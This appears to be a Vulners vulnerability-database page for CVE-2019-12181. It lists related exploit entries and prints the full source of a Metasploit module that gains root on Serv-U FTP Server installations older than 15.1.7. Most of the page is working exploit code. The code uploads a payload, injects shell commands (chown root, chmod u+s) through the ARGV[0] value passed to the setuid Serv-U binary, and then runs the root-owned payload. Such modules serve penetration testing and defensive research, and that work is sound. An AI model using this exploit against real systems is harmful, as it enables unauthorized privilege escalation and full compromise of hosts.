| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| Exploit for CVE-2002-0526 | 12 Mar 202611:02 | – | githubexploit | |
| Serv-U FTP Server < 15.1.7 - Local Privilege Escalation Exploit | 18 Jun 201900:00 | – | zdt | |
| Serv-U FTP Server 15.1.7 prepareinstallation Privilege Escalation Exploit | 2 Jul 201900:00 | – | zdt | |
| Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2) Exploit | 26 Jul 201900:00 | – | zdt | |
| Serv-U FTP Server prepareinstallation Privilege Escalation | 17 Jun 201900:00 | – | attackerkb | |
| CVE-2019-12181 | 18 Jun 201900:00 | – | circl | |
| CVE-2019-12181 | 17 Jun 201915:16 | – | cve | |
| CVE-2019-12181 | 17 Jun 201915:16 | – | cvelist | |
| Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1) | 18 Jun 201900:00 | – | exploitdb | |
| Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit) | 3 Jul 201900:00 | – | exploitdb |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Linux::Kernel
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Serv-U FTP Server prepareinstallation Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges on systems running
Serv-U FTP Server versions prior to 15.1.7.
The `Serv-U` executable is setuid `root`, and uses `ARGV[0]`
in a call to `system()`, without validation, when invoked with
the `-prepareinstallation` flag, resulting in command execution
with root privileges.
This module has been tested successfully on Serv-U FTP Server
version 15.1.6 (x64) on Debian 9.6 (x64).
},
'License' => MSF_LICENSE,
'Author' => [
'Guy Levin', # @va_start - Discovery and exploit
'bcoles' # Metasploit
],
'DisclosureDate' => '2019-06-05',
'References' => [
['CVE', '2019-12181'],
['EDB', '47009'],
['PACKETSTORM', '153333'],
['URL', 'https://github.com/guywhataguy/CVE-2019-12181'],
['URL', 'https://github.com/bcoles/local-exploits/tree/master/CVE-2019-12181'],
['URL', 'http://web.archive.org/web/20200803153621/https://blog.vastart.dev/2019/06/cve-2019-12181-serv-u-exploit-writeup.html'],
['URL', 'https://documentation.solarwinds.com/en/success_center/servu/Content/Release_Notes/Servu_15-1-7_release_notes.htm'],
['URL', 'http://web.archive.org/web/20250208173448/https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-Potential-elevation-of-privileges-on-Linux-systems']
],
'Platform' => ['linux'],
'Arch' => [
ARCH_X86,
ARCH_X64,
ARCH_ARMLE,
ARCH_AARCH64,
ARCH_PPC,
ARCH_MIPSLE,
ARCH_MIPSBE
],
'SessionTypes' => ['shell', 'meterpreter'],
'Targets' => [['Auto', {}]],
'DefaultOptions' => {
'PrependSetresuid' => true,
'PrependSetresgid' => true,
'PrependFork' => true,
'WfsDelay' => 30
},
'Notes' => {
'Reliability' => [ REPEATABLE_SESSION ],
'Stability' => [ CRASH_SAFE ]
},
'DefaultTarget' => 0,
'Compat' => {
'Meterpreter' => {
'Commands' => %w[
stdapi_fs_delete_file
]
}
}
)
)
register_options [
OptString.new('SERVU_PATH', [true, 'Path to Serv-U executable', '/usr/local/Serv-U/Serv-U'])
]
register_advanced_options [
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end
def servu_path
datastore['SERVU_PATH']
end
def base_dir
datastore['WritableDir'].to_s
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end
def upload_and_chmodx(path, data)
upload path, data
chmod path
end
def check
return CheckCode::Safe('bash shell is not available') unless command_exists? 'bash'
vprint_good 'bash shell is available'
return CheckCode::Safe("#{servu_path} file not found") unless file? servu_path
return CheckCode::Safe("#{servu_path} is not executable") unless executable?(servu_path)
vprint_good "#{servu_path} is executable"
return CheckCode::Safe("#{servu_path} is not setuid") unless setuid? servu_path
vprint_good "#{servu_path} is setuid"
CheckCode::Detected
end
def exploit
if !datastore['ForceExploit'] && is_root?
fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
end
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
if nosuid? base_dir
fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
end
payload_name = ".#{rand_text_alphanumeric 10..15}"
@payload_path = "#{base_dir}/#{payload_name}"
upload_and_chmodx @payload_path, generate_payload_exe
argv0 = %(\\";chown root #{@payload_path};chmod u+s #{@payload_path};chmod +x #{@payload_path}\\")
cmd = %(bash -c 'exec -a "#{argv0}" #{servu_path} -prepareinstallation')
vprint_status "Executing command: #{cmd}"
cmd_exec cmd
unless setuid? @payload_path
fail_with Failure::Unknown, 'Failed to set payload setuid root'
end
print_good "#{@payload_path} setuid root successfully"
print_status 'Executing payload...'
res = cmd_exec "#{@payload_path} &"
vprint_line res
end
def on_new_session(session)
if session.type.eql? 'meterpreter'
session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
session.fs.file.rm @payload_path
else
session.shell_command_token "rm -f '#{@payload_path}'"
end
ensure
super
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation